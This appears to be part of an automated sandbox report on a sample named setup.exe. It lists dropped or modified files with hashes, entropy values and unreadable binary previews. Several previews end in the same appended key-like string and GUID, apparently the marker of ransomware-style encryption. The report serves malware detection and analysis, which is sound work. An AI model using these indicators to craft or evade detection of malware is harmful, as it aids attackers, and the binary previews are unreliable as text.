              Preview:{. "...n.rA.......@.z.:.:.U...{.a`.......w.$..n......XB...j...5mG....}^.../.8.P.EG..I.X.}..d..,..1...DkO.mc......Kg..4.6.$=g.K.+h>T8.Hy.5............Y....&.....u9>..?....;.i..J...../_..L..."!.v...]4.....P@.1.+...2.?E..'......K,......wJ.......6C..?..8o.zi..|..C...k..!.H.<........H.G....*.;./9..D,...d.E.C........`...3.:..P5"...O...N.xo..8...>b.....x.6.F.TX.S)....g..&..apC.?te...M..X+_P..3rtM...C..n.q...}w.'..<....rp....>..Y...X...?..G.0..K....S..3./(..:....sS..']\...9.u...`.....6.....+gd,.rH....E...)....O0.,!..@w....q.`g....].PS.......2....<....e%a..]G.^...W..d.t.w.. .?Ka...../.l!..S.K..cx.f..|....=G.-.K.>.d...._....l..Qp.^6/..3.1...U..c....i.gVX,..Z_Ve...Z{.`...*.`#.....w.J..7sr.t..]...@<g.m.....~.tX..7..?.O.oj..9.E.X^.....u.{....."T...%_pI.><6I..^..b.6z...v.I.o....)`.J.b..^(.O5=.P`.1..n.4..0.6.........M.Dh+..3.b.s\.a....D.P7..{brx..i..L..4...&-s./R.....9C.Ye...d.4.cX..O......P......[..83@.}n,8...U.D;...!O}7T...ACr..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):80603
              Entropy (8bit):7.9976121233517485
              Encrypted:true
              SSDEEP:1536:w6FOciv9gl/xEsYLCFV9RpnUci1LOZxL852k6q3Y:LFOci6BSsYLW9n1i1Cx5v
              MD5:C55C4AC6569B705C0B8C71198C8E7616
              SHA1:9F5B80657E09E09C68C250A998D39E0ABCCB728C
              SHA-256:AD3206F736A7AB8D1EEC7101652DD1DE6A199862D9A3D0AE2A72B0110FA3C640
              SHA-512:86FCC3AB57537B09220C719C792082B7A62C62485F8E864BDD253E6EF525D749739AA86A8236BC80A1B4B7C024A96F507488E20A416B55D971F677E89A794910
              Malicious:true
              Preview:/*.. ..2f....uY.i...d0.H...tNe.K.gF........3.=w...&N.l..^......~.....`.... c..[..FF1.K.&..9.._Z.B..k..&.?.|."'2?..b...o)..+..y..!..l..(./{..l....6.2...s'....,....c.e.%..r-/..;G.10.W!....N...."K..D_E...9.f..uc.......1q.ov.E..#.W.D1..H...<.R.+0Z..'_.wN.....\p.....%.A.5...$$..._...?4D......t.....V>El.}j.H?.S&...V[n.|N6.....j.p5...R..&.Y.52]...q....I#..]:..fk........\.....[ .J.;ru.l...Xs....v....I.,..%+.....%..2(h...9..\*.\H.r.KF0e..[.{._..J;..O.....!o..y."...._.]..q6.5...0..?.....A.ikl.D........$&.a.:.#. 2......Z)...1.[3.=b.}...?A:4..k..w.I....C.~<c..F.%.)fwe4....S..Nf..4>,G.O.C{..Cl......jnP)....k.,..u.5.d.......0.2w.X.....@&:..|R..}M.IqG._v..b{_...<.%.._F"K.Z..ERh..k..EZ.~..9.....}.D).?....K...oWy.....t..-.,...W....~..a...W,.9..g..I.n.M.4.wp*..E...s.A...GeW].Q....C.@....+>.jO.&#\7N.{3..-..X.&~......9O.2w....Ydb}d.....s...@.M..T.N....V..i=..t.0gR....3eD.v..D...VT..K.WHF.a.FM...`m..k..w...w0|...f..E..j..W...z`Fiia.nL.......gi..g.........S
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2731
              Entropy (8bit):7.932677191646243
              Encrypted:false
              SSDEEP:48:bQWSEeYSj8zwEh284rbdKKuZwgYNvm2BFeNofmOnlGu+qv6OfenD:b5S984rbvuZwg/2KNhOnlOqvQD
              MD5:28323B6597C799038D5384EAF0EA88B5
              SHA1:72BD4808D8BABD72A6E0C00E2533760B74939AB3
              SHA-256:D0595245169718B4ED63FD2EF48E390D0F9F50D7B01934F8413EE9BD6F4B50CF
              SHA-512:FB9819983ACF03CD10A8EA8F44CEF0F0065CF20024A4927369455375FE5A3D7D181DCF0ECBF576FDB4DF3AD5410DE95AFD2B0FCB415696DD7205568775661EF2
              Malicious:false
              Preview:{.. i...-.\..TS.~.....>C..\.&V.'..X.W..-..K...X.j"...uI.^.[....5R[I.rDok'Z...3"....G...{5.SD.?vp.fE..JLL.Q.].k.S`A/....i2....y.d....PO.X.........f.p.X..~..........@n.2)...U....P.%ITSz.......6.b.....m.^..]..}F...H......"C.....W."Rv....l.#..W[.9r\.=.96.a>....t.&...s.3...Z\4)..K.2D..f.w.l....]a.O........\M....(7B.D.6..<.r...Q...}....ps..Y5.cZ.+.e.d.....4.K2.@;.[...4....g...9."J....4........p.j...X..._.m.a!.[..#..I).d.2\.....%_...zU.h10........(.rV..C..._8....+..^ff1P..B....J..c;9.<..2[............]...R;?.....V.j.X.G".E..).n-.y.&f.'..m.$..2..V.BD....?..IB...4...`.o~..`....$....W....e$?,%.XA.w.$A..|..G,.....,<zN.....[<q...R1I|..9.>.:...}.llW...'...S.V...z.Z.$.T....b..\....t......o.LT.c0.0)...]r....Z...AZ....m~.;<....U....! ..^..^..&m..Q<....}.=......k.P./M. ..b8......-X......s.zA..y..5.&..e.=.....YX.7E."..u+.:B.Snu_..:6...#...K...P..'....L...*).G.2..Uf..j....i...8..t....}....V..D.6..J....B........r...4D....E.X.`...7....7Gg..S...../.Ew
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):625
              Entropy (8bit):7.622242417020283
              Encrypted:false
              SSDEEP:12:25Nekn3TlTBak8II7ioWHaptiMxzMVOg+jObdDtUgyXQgrDEqQpVsMR2cii9a:25Nn3TtIRWHcxzMgCeislQIbD
              MD5:98ECAE192CA0BFE5C9DE267B3AF96503
              SHA1:51766543CAA6B3FB31AA16EC598491A9293A639D
              SHA-256:8E398AF6C8FEC554F0FCE34DCDD60CE915FE81070E05B3DA7CE7F5DEC5763376
              SHA-512:DC80EABE2FAEFF361A4439086A684300EA6E3F7D28B06FFCA4BC653B071A32AB66E2A85738E3D374570B5035E0C843FA34CB1A75AFEE1431FA1647D370F1BFB3
              Malicious:false
              Preview:(func....n...3.....~..U>z.l...C.a<.....r...0#0~.&....[hB.d...w.k5#.2.O...6..V..jEt{.....9Bs....].8...dG..h..qJU*5B.A*....&.>.n...r"Y.O.... ..7RV.)p9.lXY.$c.&...jQl..c....Jl!'.?.....H~.:..#...:y...t..f..UkZ.A......]...0.....y..N....Qvp.....RcrX.....q..j....2V.t.u/..\...."..U3.../.e..(..D.~W.k^|-..3.j...J.\....z...p.....H....J.-.p.|6..+*So...j5~.,..h..{..N7>.qM.d.c%.....v..0...dp..W3_.d.P:Q.)....6.&....D.Nj...k..O...&.Ip...L..+.....R..%....m$d....\o.XV.L....6.|..$.q....t.{v1Y...#..e.,S].x...5.t*v.%.N&P:.Z..k?].S7..G..3^.....n.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):11551
              Entropy (8bit):7.985415212988112
              Encrypted:false
              SSDEEP:192:F47AlVmiWE0XuM6FKvzvLa0Mq5ISkVunkk+8bG6D598RZGG1wlBGCFo66v5pJF8x:F47Al8OAuFKyGAVuXZJ98RZGWw3BG4fl
              MD5:17690DD921F251CCC2CB04808C87D1D5
              SHA1:D773B462CA802EC50FE2950EACD966A981287E94
              SHA-256:61A82C8FDA7BDC45326EB44A63F2CC87ABD1C22C7317F36FA15A179CAE06D5D6
              SHA-512:AAB3F8BE105C2B633BA7EA4942F0255234DBF71DF20B0078F938EF9F3AD1B40DFB75EEE62396B57D9FB9EFE062AE391F5D166F85DD8F2CC513B94F38E4B15554
              Malicious:false
              Preview:{"fil.0Ne.K.S#........]N[G9..D....i..5.4..6u...6....w.>BZ..R-.....C.20......@. .x....*..]....l....s..._M..+......;..W........J..F..k.....T+)..\.."A..j.aY.-...J..y.......c...M...~.3...WS..h.FPh.....G...N....e+P.rDg.;.Z..}.d...WM....(-#k} .......i..R.iZ.......L.....h...5{..^.1...G...Qe.F....`...^A~....q..tjZ..=.n.v...9.....C.x..V...;.j.G..#zqj.y.L.x."1xI.&.....|:.%...`.....qwi..w.2h9g7. ....w.TYq.YQah('..o"..7N=s....PY....J..a.Oe..<..6.1..Q..0c.,02.CEv.da..`.Y}..P...=...l.........=..do./......)d.=..ND.t.A.*...".3...RA...W.....V..:.]rg..B..?'.%`5q.(.....Y..."......|.u../..G.a.1.7...cQv.......nF.49.P..|...a._...uq..,.[....|S..K.e)......!7@v.a.S...I..#.^.uVN..\>.G$...L..........6.fB.+.........A\+......v.+..$r.....Q....V.R.#VK.K...4jB$..^...Zsw...&n...{l.H^...Z.q..N18.S!'*.!..pt.;..nl....i..9tn.'.d.A.'..B.'.:.\.........n.4 >..D.....bxL.e.5iw.3WI...1o.....m.........".....".GX.>@...D..,A.{..TjEG..TI....$2|u'.{p...2...=...2!.dq...M.v2.2.....G.I...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):8114
              Entropy (8bit):7.975345262402013
              Encrypted:false
              SSDEEP:192:JIB7KPLWcXKEmgypFXCh3gEnxWKjTo+6TH06ZfuK9cjF/M4JSm:JIB+WWLypEFgGxWKjHX4WK9cjF/BSm
              MD5:47BA04F3DD8E58715AAA24A008B142BF
              SHA1:AACEADDE4FB682BB45325C32D8669BA888138264
              SHA-256:AF91446E031A472587CA616BE542D2898E97B5327D2E4B52828DBEADEE814943
              SHA-512:5964AD51EE5C35D8E5420BECFE762B97836857466C63B7FCE9979CE4B7112C90E9AB54892B6F90EFF834BF30601130C16F697E782FA04ADCE2565E70EE15730C
              Malicious:false
              Preview:[{"de..3}Kh.2U.)".....S..7....V.j..._........<;o..v..M....K...$.......8.l...[I.;...g.....{G...p.A.....V.._.W..[....saY..E.p....o....b.........*I..,..(O.k......n.....}..[.Z]..S...9.r?.8...UQ*.y.......i..s..R....).2>.9.8. ,.|.....5+/......i}.<.:.B(... ._.m\..p....!...O.R.o....4.."..e.;.P..-.k.c.?...S...v0..V...P.....0...}q....]\....$.[.f.........]F.....8D..b...+k...'5..6.y.."..l.x.Pk..%~...ZiHt#....<l. ...-.......1..~dq...^n.Gkn...X.].UOJ2|....@....@..*...J..h-D.vL.....L-...Y...mu.g".BB.|I.K...]._.x.H<.....8...6.".....;....QF...m...+....g8$....k...b..V.._...../...~./.....&f.*9.t..._.=.".o.../.......Km..h....7..a.;.....|.**=..&-..m.wx).f.0...cv).1/2R.a8..{..*...`.......e/...r.T5.b)....OH..9.Y....x.S..i..:. .,eL.KhI.r......%......\G,.6....Ch.h..YHyd.n.H...Rw%..(Q.j....i.`hc..B+t..;.F<.h.Z.8.T.e...j..O...e..8..I..!.....Q7]..}..?...X......h.wS........&.....>..=d#........'L....o....P.x\.....e.....3r.Z$....i.d'.}.y.R..&:....E}...^..0[.Z.h.j".7].a
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):544977
              Entropy (8bit):6.6038906939532005
              Encrypted:false
              SSDEEP:6144:xfnfPS1dSF80nXKgsUXWdx9BPZkT/CRXqbe5Dq31IVlMqX+wd5/CcMMJcRULt0Nr:xfnS3dTgsUSfBIZ
              MD5:D5BB7B460720A89CE73499341E2FB074
              SHA1:1C72CEA4D75CDFED4D51BF3D390608A85A2F9A7C
              SHA-256:62766BB005B7AD9B0A13AB552578D562E973125F4BA95B717664444A736B7F9D
              SHA-512:1EC8AEC5A5E1A262128C56750DF7E1A97698B89561339D1CB891DF94AD6BBA95B7F29390A6858787CCB8EF90E3A482446E73D40E03A4132C8AF5B62F85FA822F
              Malicious:false
              Preview:/*.. ..E..8.C.u..DV2+.0.^......s2.*.p.hAb..!O\....F>.v...F..S..x.J....s......e........~..e.8..K.;._.ng.....R.K4.Gvc.9.IJ......q$$..;\8./>..6....E..*:.........1..d..I/..0.A(.[.....j._E........:..3..$..z*..H...^.x/."p".....k..es.m......M8D't;3+..a6.D.N..O.\mHp.(.(..0.t....|..A.={..........g...28...f]..~q^.(...f|Q8.E....ag14......R[SQ.1....Q, ..L.XY.0T.cm.C......t..gJ.1.e+...*..$9.#7...Nf.H............9..$.9.ZF...(.f.....j...pR....:..j.3.a.?../q*......>..Ef.$......rlm...@{QN$._V^2.T.....z5O?o4.@=...@.pM 1.%Gv..h..jb5.S'.]..k...N.g.M0...1..m...R...2::[F[.ZvYH......R!...W.......a.....n.3..G.e.`6... .]k..kq.....Q.*Cl4.3..?.I...?.k[......E..nyzU.tY.4..DM......di.V...:S....8....S...U..__..Z..6.....Zlp`...ix...S..y..s...#..-/.V.X......*...q....v........Cn....GL.6+...M.._...ic.%o.3w.A.d.e.....Go.*..J..3...Eb.....K.F.O0.n.%..O.U..Zf.a.....T..$...2.]y.~..C..$.m.v/r..v...."w./...5....+............tp....3...O"At..!UC............r-....B
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):261650
              Entropy (8bit):7.487444204701632
              Encrypted:false
              SSDEEP:6144:YQeCiS1pNz+q6mRMBAmBbChv2sH0JNLx9FNNsZ9Dd/ceW:YQeYbImRibboFHs3FIBdY
              MD5:D3DCEAD08FF3FAFEB34E0C29B73CD21C
              SHA1:5C7C135FB8A3833929C1FA29E22335D8C2F23F1E
              SHA-256:CA1CF17AD347861756B8E04D92E4C7687AFD256159BB6281CD9FC9968F681F47
              SHA-512:FAACC2614E39EF048DEF18A7CFA7D1D475C93A825863376B4ED0485DFA55B51ABE3767C99D29959D8D451ABD81CD0EE8DDA53A8B1261B94A86345D29E310DD24
              Malicious:false
              Preview:/*.. ..#W.Z.+L...].#.....v.{:..6.,4+..w.E].....Y.,.S.W...K9wr.z.0.m..$^.........2.O*..U.......:x..=v...N...5.g..V..VJ1.7...E8...%.[..}[.e.rz.~S....f.<...qW&[x8...}{.p....&...Q.{Q9.7X.0!+..K<g.y............G...fn5.W...;Y..].l..(...1x.Q...%....D..5...U...R.....G.L..Cr..ka.L;k%...+.|6..........A.w...:.&...I.Z..|......ZE...4G.....#}..|:.$m...e.(.r..Nr...^....gI....@.....P..4.|.8F.....T ../.<.."......._)Gyl._)..]5.....iki..h#3~.g.,....x5.F..K.l..C....&.....m.K...l..b.H..'A#.Rgy....I.3.V.$..GJP-...........L..$P..8`..Q...3..v...#5.{.$.......9.2.C.0...G...7?U}....zjR.........s....?....g.^.m|..``:3+|.+N..H...'K6[n1f....v|..9...+.>.O).;h.J..FR.M$.......-....>|.....d.....Q.j.cL.:.m..g.b.6[=d..m.R....&..B.N7.6.a..fC.))..d}N.....2....F.&..W.z.'|..p."..k.Jz..+.....f`)e&.Mo..zz/.f.zQ.E..'..|....h...Y...@...V.,.L..6`-_...,.z6.1..V...]..:.a...[...l."E..&..l.{...w........V...g..ST.;e].W0`0.Y.54R8.c..7...I.o.\...6".e....GU.,O..Y.x.".)bgg...V-....N.....b3...A..K.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2075
              Entropy (8bit):7.893588923990379
              Encrypted:false
              SSDEEP:48:Em6Vh7m4PK1pAVGAhdt8SPYKgCmMnp1GojGNbgACsbCXUAX1sZD:jy7m4S12GA1zRmmp1v0gACsbaUy6
              MD5:4488C809350FB8EC3FB7BD66263F07DC
              SHA1:1FE0AA7E6137EA0D42C6D38CA4BEF24AC19E1E81
              SHA-256:D884C64C6120B716AEF0390718D5782CF3C3C265A83C1D5896F9CFEA616E6E32
              SHA-512:C5D7C5EEDCA1139EADE5CB9108848587D79A0C7B9AE26BA195BA7BAC1EE9AD5984CBC60F79AEAEB7C3E2FC1BCD90F205987AD46F74397728F0357255D89CC3D5
              Malicious:false
              Preview:html,>.{..\.%v.'..}....}........?........L.`@.....WxC....x...0>.Xa.....p.l..n....E.B.)SFOc.C}....8...]d.....'../.._RJ%,.....{.,+.{./.?$._....7A......r&.@71.....=8...f...L}..@..Y ...o...]1,/v.O.O..6.~..U.W....Q.q..X........4EW./...e..........X:.'...l!.g..@I.(.[.b...|...E......!.*...p.|..........1.... ..hcI.F.^I...T........a?..[.5.`Gb..$B.O....\.....D.-...]Y7z.b..~.5...<_.K9t....._.H`JBX.%#p!K.K-..N..p..5..b{.i...u.....?.k.*H7f._.k...an...w.....+.,{..B2. 0.....jV~..B..L.8.4..._.`.F9.DVX.Gf..?.2&..-....;......l..B..0..u..#..K.j?L2....+H.hM.o..W. ...$<..s#.n..^...../.X..2>....x..}`.8......X..h...8.........b.z.......p.n.X.h.(.y)..bq..@.b...J.fA{..[B^].D..e.:HH..{....]f1o.......e....,..D....5....R.8~G....V...c).......'...I....$.....wL..v..Z..$87rNx.1,..0...o+.u.;..v...).............e.-.8......)!.:.1.g.H....8h.......0`.?f.H...?).`^.&.../.&k.nA..~..\}p.E..<..\...........R./e.}..7...T..(.N....J...L..`.....<G@..qz.....>.h..O...+.cR...#.:n.=.m.7.U3g
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1144
              Entropy (8bit):7.797472359682081
              Encrypted:false
              SSDEEP:24:Bt216jfplRkdTe1nMOSQIPwq+80OAnAgDaM7LJUhZbrkYbD:bjfhkdTEeQC90OAnTWcLJUDbrRD
              MD5:B7894293AB7747FDDEECB8A59256B11C
              SHA1:23EF3EEB809B3BAB05D42C42D33D5EAECAA5D0B1
              SHA-256:3A8BED63AD0A2F6084CD2AF845078E9762F85A01C63BCE05ACE7CF569A9C9FEB
              SHA-512:EA09F5D19FD663CC87A2C19AC24A115927A2938FC74BDD528D88B921AC6A0AFA0DEBD9C924AC8C50053501F081AAFBF6BC177C834CE158A16A0E72272DD5AC8E
              Malicious:false
              Preview:<!DOC9!E.k..h..4.w.oP...O/.....ck..v.0.#./...n.g.......P.....f.../6.)i*.,..M. .Rm..]..EuLaq..'.fT.+..`....\j3u.j&>..=..ba.*...j..>B.f.Z...ah.f.`i.g.k..A..."1.r...z.....#T..H...'.d.b.CE....K...n*d.w..@G.........7.y.+.q.=..6..|.0..^..c..#....bWOd...L..rE.L9[%}A.......|L.trK>J.I}^.P...[./....5...R%.vu...K.&.hN..!%.5...M.M...N[..H .<.!.i....H......3....H...d0}..$.g1.U.*...<)...GSld-...b...Q/Cd...9.....m..~...puk..7uE.H0@)"...R.f..G....XN..=?O!....Uf.B.qA.~.^.CS.n.d..D.I.Y.....At^.....].,..F.......d.y.O2J.A\.}......5.%....HX....S.X.K..^....'..S..K4.....U.m...)..-@....+.D.=$'./..W.y...........!......<.v.[..;H... ...i..z......t...Q*N5.......8..`m.J2...n)...h...\...mP...F..I...z0......C..x...Y.0...d..M...g>....y.c....J?~....&...;....a....)Z.a9...1..DP)n.Y'..6*w5aQX.:...N.-+....U...xf..wAf.a.#.....0......hG.....L..r..........@.2.B....?.kdoq..........H....9.1X....Z..t.j*K..y....7.P...U8.<...n....N.T......[.&r...'..)......b.%v.,..U..:......%Z.h.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:GIF image data
              Category:dropped
              Size (bytes):70698
              Entropy (8bit):7.997294572594765
              Encrypted:true
              SSDEEP:1536:bPWHw2lqyX98rdzruv96YuE7sPRffX5oYSLlCcKGCUvrbAB3inM:bPa5lqyCxzK6YT7sPZfXuLlCcKjUviiM
              MD5:2DC50A6E5D34EA9590882DA844ADF82A
              SHA1:B9425E4AB68F6D664CB2A7DF60D1E0770CFFBEE1
              SHA-256:49A8109B40A72BDCC5DEC818F569A1AE893C99A928D8D60E3A74A3B581E8A30E
              SHA-512:0A24BC944080DB6CC80402111AC0416236CF8584A0BE6E3CD8D5FD2222603BBEE1E66264CA73F294B7CE015B5554977C1A6AA70C28313D4EB12B48C0A6A16047
              Malicious:true
              Preview:GIF89*..*.9..BR......k..V.....+.m.b,q.-s..h:.PmE.O[....<`*...#0..{EC`.~.mgT.W@.....HT..&P....`-&..A.8.T.;.)P........yq.........[.x.{...s.]go3..i.s5o1p.t....c4..fx.Lt#..;.$..~]?7.h...........y."b.Tta*`QFT..~I.5<n..]1K...`DZ.C.e....DQ.....VCl.+r\LU.`...Z.:]...Fm...y."..o~.2k....1;.V.3qf9G.zU........").0u..F.1.....z..t..i.J.XZ......5!.^..L.M......Z.........0...'.6.Up.u.|.}b..I...D..........!..#."H...4...C..h.h.1D..(.R...lk.......2.{XB.X.....d.J`\...p..K.()3U..F..=.[i..n.D.......+..#6*.....H[@....X....l>.J.17j...0..1......j...S.,..../.<ng..e..UW.\.&.kv..H...0.`.P.....c.X...k.d.*.W..[..P...|..r.e..x..N.=....0..-#L..S.X..U`zL...];.....t.8........M...6...N...u7..2...L...0n.uN....w\..m.BbW..\. ...Z@.jf..k.*.Q.....>.6.x(.IV[....BWL..v\.....O].k.5:.....e....qb...M..3.E..8.9%.........j....-MFy...X..z.#[.bw.......Z..n...7......,.?Ih......\..}y.......:3'.7u....m$..Mx.B....*b5.2...7C.......$...(.6.Sg...."..Q......s..m.2../...q..-..:i.;....Rr&...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):4698
              Entropy (8bit):7.96154707237261
              Encrypted:false
              SSDEEP:96:n3X6bZz28nxgVi9k4D8ONf4usCn0+WIAVs6cuGCLhgiffhbZ85ySMF:3XInxEi931Nf4usY+I765eiHHr3
              MD5:050BBB271FE5E81D4AE2AC237C6E8061
              SHA1:0D9A91FBE1E5CA89DB4ABFDAD255C54C9257F89E
              SHA-256:A8D2D14955C6F1C4E3BED6425673B6DF99E2712C6DE91B239E3053AEA2F9773F
              SHA-512:E6E26C7ABB51CD77C3038876D1F1F48A79DED6B202857CE19E0AA46D19759941B7EFE62C5085050F0240CEF9A061943B43B6EEB2C0C831562AD6D3070E79DC9C
              Malicious:false
              Preview:.PNG.I.Qo.B.....55}Hf..I.........z-.\...$.....aa......0.Vu.ju".@.S.....!6.....3..zY%..2{.}2.Q....3.B[t4 ..|.h...Y&...-.{U....{^5....!_....u...*.L6.M..h8..?....!g^....k~...LO...91..\.zM.WJm...0...N...n... ......V<8....M._-J...y~.....&..Q...{.\.|.P..Q...v.|b'.^)..~eq|......F..^].g..ba...Q....^..M..[..Qyw..=r...Z..m".n-..I..,Y....(.......<.a.m.=..N.'.....w.F.....J.........{......[. M.6=..Vk..^......+.$%OG..ij\./2-...M.A....$N ..yg0.or&..Pd'6.Sl.K.&j0..?...Y..@.}.3,..mM...]....V....Y.Gh.'..].V.<...T).nu:..Qi...u.7.&......<.l.N.Wc7..i.6...y.......'.M..@[j.9...X.?w..'........%Re&........v..?)v...%W..Q.%.hG...Le.......e...En.l.......[yP.....+...S.*..@n.w;.GOQlM.......d....I...'.......~.ZaM..."..TH.S.<5T.^6*........s.>N 6..p...A.?D....]%~.t..W..w...!.....2@..a.M..M..'...(..{#......3...8....r..+I>..f\..!...;....L1@....7.nk@..".h\.../.J.Mz.o.#...l...aas...V.....[.....[..A.m}...Q(...[!ox...eIQ. ._.@.(*0...J'[?..]..-R...Hh.q...@....j....`2G.dcYNi
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):892
              Entropy (8bit):7.740659710219279
              Encrypted:false
              SSDEEP:24:+irv20ia2R4Mu9Pl0P9V14zSwYbhqj3K+WbD:7vMRHu9Pl01L4znQhqj3K+ED
              MD5:3CEDE69926377FF08C7F04631859BA34
              SHA1:290EEE365AD8879E641D4C7BD3F143E7421BA1BA
              SHA-256:7824296BE7A412BFDD3F54AB890BFD2AC6E16295594E764487127584E358F4E6
              SHA-512:27E12C6F9FCE13D0B0A4A3B2CB0F926163C6346030281860BAB2309886904A682F62CD59460F452473B0B3E7D812CC513849FB0377A15338CE51CCF94924EE45
              Malicious:false
              Preview:.PNG.^G....-YUp<.....O.|J.....{...=......uG.....r.....N..2.rr.}%F.D...PqP4F...uE.Z4.P.*.e..|m.u..#.<."...?u.B...i......J.d.?c.z$.D..~..r@.^.x..R.a.K@7........^{7....Q..q.......J@.......Y....SH.$-r.Q~6...F...i=...@.G.!...O........Ty.....Mcn.2#.:<c#.#..5U......f@Do1i3....@..Z.D<i..!.....o.......5.$.b..C...[DS..-.<L....H.D.$.....2^w<p.-...Y3huT.G)..rc...z..1.}.0.....L./......Y...9.....6.!0_....,..fs.JY{....<..{....ti.....~.o'..P.......[1..].....<.PC..z.......'..Z.I..`.N.X......>}..>Cs..|.H.[.hX. .~..Z#6qI.q.w........n..>...X_U....2H=kr........Cq<.a....zD.8.#?..?.;\`u<..../..7.G.%h.d...b;.4p..b.cT;...|Y..W.k.(].......8....e...v....-e.d:......\r.sc./.C^."...=....FU...#vrg.t..I.P.....[~.~....6v.x.....f.4...X..a..J.l)..Z..U!...g..%..qW..f..........].@..g..|g..C......VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):494
              Entropy (8bit):7.4904293363212195
              Encrypted:false
              SSDEEP:12:RZfgqa+sWvn84ILswBalimJ0X6JLwli/CKyPWfvpTsMR2cii9a:RZfgqa+s4n/ILsSarJ3JElACKyPU4bD
              MD5:0F1CFB429B22483BC2BBC6F6098A6201
              SHA1:276B7B2BB40375121DFC2B5C276A87F3F8B44347
              SHA-256:6165B4407C1FFD71F8B85B112BE3A80842AB279B80AC54B887FD02C9412172CA
              SHA-512:60B55928F6B898005B179E7E984F8CCD7C0AD94A93F431CDC8418CD5490CF14F6965EE0465D054846ECBB94D787F782E327806857F9B554FB917F8E44A0B802D
              Malicious:false
              Preview:.PNG.N.1_.W..C.,..6>.`R...\.x..^.|.E...G..6.R{B0Rq%..#..Cb&.[....O..D*...z..p..R....1gcv......Ahu..uTR.V...;a..c..,*[..*..... ..<..{........h..`1....5.......:m...Q^../........x?*.BO.m wes.$.....R.x3.bc.o.'.8.......a...2b....E......rje.q}..&#.nb0I.!....a.b6.....`{.e...` u.:.~./.Z`!...'.....;W...e._....7.U.......[.......J..q7...{..H...|A.*.G(.].,.<.f].'.....`..oD...k+!:..N...._.>.<.......B%.-pVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):586
              Entropy (8bit):7.639367714847477
              Encrypted:false
              SSDEEP:12:IO0Ngi7xZjPkKSdhqmxuZm+m3HKqsoydmpmnhKdtW4Pu3JsMR2cii9a:IO0Ngi7fDjjpm+mXKjoyd9wdCWbD
              MD5:783AC9CE339BC2AFC1B40F46CA67B710
              SHA1:003CA8E929F77D484E243007A1F3067CFA690665
              SHA-256:1805462946A505B62581873FE2CFFBF8086E13C4D7071167880F374DA1704F82
              SHA-512:345CA4A33DDCB16E7CE6B1F3882D844E1FC9F60283A5A1DA46A6C67CA091E1550785C829EB22C6B9102E478B6FD0555B33F0F4652979584561969EFA7332D2BB
              Malicious:false
              Preview:.PNG....It..9...Ed.K&?~9..`....4.X=....|&&..m....E2... .....@e..n.M.SE.tm.j.B2..K.o.O............^.....5..[.~.....y..N..N..x....L...K*....0M...{q.......?4...^.5?;(n......3#.u..$4vlF.qL....&...ey..*CO3d..I.S..E...<...e.X..;8.........\.'...u2m......f..e.......L.....e7w...g.9..t....E...,..,..S....v.,P.....HY.=..U.r.K..gSG.g..6...c....u..l..{)0)@..p.....w.,...y..........G.]ll...."#....]..e..\fA......s...0..uA.=...V.8..|...*Bc..@...........O....g....h...d9....}.^....(;(.*.x...'....bVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):494
              Entropy (8bit):7.536870743936129
              Encrypted:false
              SSDEEP:12:1/fwlFEuSw/KUPZsZAf3PNkWKO/IYzsMR2cii9a:1nwjERUPSZAfl1KO/XYbD
              MD5:67805A7E66635F4503B15CE7D17CAB1D
              SHA1:6ED371BDB25CE17AB6C1B20045C913F684FE989A
              SHA-256:23ADCE0FFE575694442953A3B4BE7829441584899038946CEADCEADE67A29F56
              SHA-512:0102B0AF27C89EA70A84919C62B7283A9845F31ED06DE2A80F18AC2159D126839E4BE7D4C9035C3FBA1043BFC3EB11AFC32A57D8FA215FC9980B711D0EAA85E0
              Malicious:false
              Preview:.PNG.........\44.3R..:Z.....<..E.G..U.}5.A.Hg....i..`..[N.....%..c.T2u..b.D+g.}a..U.QB...?JX.g.W(<...R...A!...:.^.%Y..)E%f..i..ao....A.)....o..].n4...3...[/..*.S..ub....V.%.U.?..r.MC....M....".,.....Q;...b.....p.l."...?P...[......3.F-.4.*f.....YJ;.$X.&.....M..?U.E.0...F._..4.2.'.~..mXy...@.5......!D2.....k-$...9....]..9..5....w.E..b....b.}l..Js.L....D.*...._....P....x?t.|...x....X.....6.S..|VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):500
              Entropy (8bit):7.489703593234915
              Encrypted:false
              SSDEEP:12:B4AlRpCbk2Vm9y35X66j05cWz2k2urkYJsMR2cii9a:9lRArm9AG622Yw7bD
              MD5:B195494D0BC45D59D60B7E6B4B915E6A
              SHA1:225395827EB4F3A409A263BC9CD210B83D8376B2
              SHA-256:BA7D563605114D389EC10D6712333ABDF6F9DFDA6D322245224D713A427125FA
